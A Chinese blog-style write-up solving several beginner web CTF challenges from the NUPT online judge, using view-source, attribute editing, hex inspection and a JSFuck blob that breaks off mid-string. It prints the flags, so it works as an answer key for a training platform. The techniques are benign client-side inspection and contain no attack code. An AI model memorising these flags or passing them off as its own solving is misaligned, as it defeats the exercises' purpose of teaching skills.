[南邮OJ]Web

签到2

地址:来源:网络攻防大赛

  • 说了输入zhimakaimen,开始输入没认真看,只能输入10个数字,可是zhimakaimen是十一个字符,后来审查元素才发现的。


  • 修改maxlength就可以了
  • flag is:nctf{follow_me_to_exploit}

这题不是WEB

真的,你要相信我!这题不是WEB
传送门:题目地址.

  • 是一个gif动图,下载下来用01editor打开,拉到最后。


  • nctf{photo_can_also_hid3_msg}

层层递进

黑客叔叔p0tt1的题目
欢迎大家关注他的微博~
题目传送门:题目地址

  • 是个网页,懵逼,查看源代码咯。
<pre id="line1"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html xmlns="http://www.w3.org/1999/xhtml">  <head>  <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />  <title>SuperSo | by:p0tt1</title>  <meta name="keywords" content="SuperSo | by:p0tt1">  <meta name="Description" content="SuperSo | by:p0tt1" />  <!-- css,js -->  <style type="text/css"> *{margin:0;padding:0;}
body{background:#FFFFFF;font-size:12px;font-family:"微软雅黑";#666}

.course{width:1024px;height:680px;margin:30px auto;}
.course .course_box{width:255px;height:155px;background:#FFCC66;float:left;margin-left:1px;
    cursor:pointer;margin-bottom:20px;color:#fff;position:relative;
}
.course .course_box h3{font-size:24px;font-weight:300;text-align:center;margin-top:63px;}
.course .course_box p{width:255px;height:155px;position:absolute;left:0;top:0;padding:10px;background:#000;opacity:0.5;
                        filter:alpha(opacity=50);display:none;  
}
.course .course_box p span{display:block;margin-top:2px;padding:2px;}
.course .course_box p .course_title{font-size:22px;}
.course .tz_blue{background:#2d8af1;}
.course .tz_red{background:#D44825;}
.course .tz_gray{background:#666;}
.course .tz_org{background:#ff6e1a;}
.course .tz_lv{background:#0cc5e7;}
.course .tz_qing{background:#64d500;}
.course .tz_yellow{background:#d5c300;} 
.course .tz_blue{background:#2d8af1;}
.course .tz_bluees{background:#2a45f1;}
.course .tz_redd{background:#D44835;}
.course .tz_grayy{background:black;}
.course .tz_orgg{background:#ff6e4a;}
.course .tz_lvv{background:#0cc5a7;}
.course .tz_qingg{background:#64c500;}
.course .tz_yelloww{background:#d45300;}
.course .tz_bluee{background:#2ddff1;} 
</style>  
<link href="[css/animate.min.css](view-source:http://chinalover.sinaapp.com/web3/css/animate.min.css)" rel="stylesheet" type="text/css">
</link>  
</head>  
<body>  
<body style="overflow:auto;">  
<iframe runat="server" src="[SO.html](view-source:http://chinalover.sinaapp.com/web3/SO.html)" width="100%" height="237" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe>  
<iframe runat="server" src="[http://www.lunzhiyu.com](view-source:http://www.lunzhiyu.com/)" width="100%" height="3800" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe> 
</body>  
</html>
</pre>
  • 代码里有个iframe比较显眼,而且他的属性值也很奇怪,不是0就是no,想到题目层层递进,相比信息都藏在iframe里面的src吧,尝试点iframe里的src,尝试发现,只有第一个S0.html有信息,第二个iframe的http://www.lunzhiyu.com没有信息,于是一直点进去第一个iframe。
  • 多次点击之后,得到:
<pre id="line1"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">  <HTML><HEAD><TITLE>有人偷偷先做题,哈哈飞了吧?</TITLE>  <META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">  <STYLE type="text/css"> BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon } </STYLE>  </HEAD><BODY>  <center>  <TABLE width=500 border=0 cellspacing=10><TR><TD>  <!-- Placed at the end of the document so the pages load faster -->  <!--  
<script src="./js/jquery-n.7.2.min.js"></script>
<script src="./js/jquery-c.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-{.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-h.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-a.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-l.7.2.min.js"></script>
<script src="./js/jquery-4.7.2.min.js"></script>
<script src="./js/jquery-g.7.2.min.js"></script>
<script src="./js/jquery-}.7.2.min.js"></script>
-->  
<p>来来来,听我讲个故事:</p>  
<ul>  
<li>从前,我是一个好女孩,我喜欢上了一个男孩小A。</li>  
<li>有一天,我终于决定要和他表白了!话到嘴边,鼓起勇气... </li>  
<li>可是我却又害怕的<a href="javascript:history.back(1)">后退</a>了。。。</li>  
</ul>  <h2>为什么?
<br>为什么我这么懦弱?</h2>  
<hr>  
<p>最后,他居然向我表白了,好开森...说只要骗足够多的笨蛋来这里听这个蠢故事浪费时间,</p>  
<p>他就同意和我交往!</p>  
<p>谢谢你给出的一份支持!哇哈哈\(^o^)/~!</p>  
</TD></TR></TABLE>  
</center>  
</BODY></HTML></pre>

  • 仔细看js代码,藏的够深的啊。


  • nctf{this_is_a_fl4g}

  • 后记:
    抓包或者查看元素的网络可以看到404.html,打开查看源码即可。


单身二十年

这题可以靠技术也可以靠手速!
老夫单身二十年,自然靠的是手速!
题目地址:撸了他!

  • 点进去发现有页面跳转了,页面显示:
    这里真的没有KEY,土土哥哥说的,土土哥哥从来不坑人,PS土土是闰土,不是谭神
  • 查看首页源码:view-source:http://chinalover.sinaapp.com/web8/ 
<pre id="line1"><html>  
<head>  
<meta http-equiv="content-type" content="text/html;charset=utf-8">  
</head>  
<body>  
<a href="[./search_key.php](view-source:http://chinalover.sinaapp.com/web8/search_key.php)">_到这里找key__</a>  
</body>  
</html>
</pre>
  • 点进去./search_key.php
<script>window.location="./no_key_is_here_forever.php"; </script>
key is : nctf{yougotit_script_now}
- nctf{yougotit_script_now}
___

综合题

题目地址:tip:bash

  • 打开发现是jsfuck码
    呀!这到底是什么玩意儿
    [][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]](({}[[]]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+({}[[]]+[])[!![]+!![]])+(!![]+[])[!![]+!![]+!![]]+({}[[]]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+[])[!![]+!![]+!![]])+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(!![]+[])[+!![]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[!![]+!![]+!![]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+[]))+(+!![]+[])+({}+[])[!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(![]+[])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(![]+[])[+!![]]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(![]+[])[+!![]]+(![]+[])[+!![]]+(![]+[])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+[])+(![]+[])[+[]]+({}[[]]+[])[!![]+!![]]+(!![]+!![]+!![]+[])+({}+[])[!![]+!![]]+(+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[